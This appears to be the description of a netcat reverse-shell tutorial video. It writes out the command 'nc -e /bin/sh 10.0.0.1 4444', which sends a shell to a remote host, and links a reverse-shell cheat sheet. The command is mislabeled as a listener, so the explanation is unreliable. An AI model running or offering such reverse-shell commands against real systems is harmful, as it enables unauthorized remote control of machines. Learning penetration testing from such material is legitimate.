Reverse shell using Netcat Step by Step Tutorial

Опубликовано: 21 Март 2026
на канале: Cyber Security Learning
6,200
75

Step by step tutorial how to nc to get reverseshell by forcing the:
webserver to connect to us with reverse shell using netcat (nc), we will use php reverse shell and netcat reverse shell.


Reverse Shell Cheat-List
http://pentestmonkey.net/cheat-sheet/...





netcat listen on port 4444:

nc -e /bin/sh 10.0.0.1 4444






:netcat connect to an ip



nc 192.168.0.211



Hope you liked Netcat tutorial please like this video and subscribe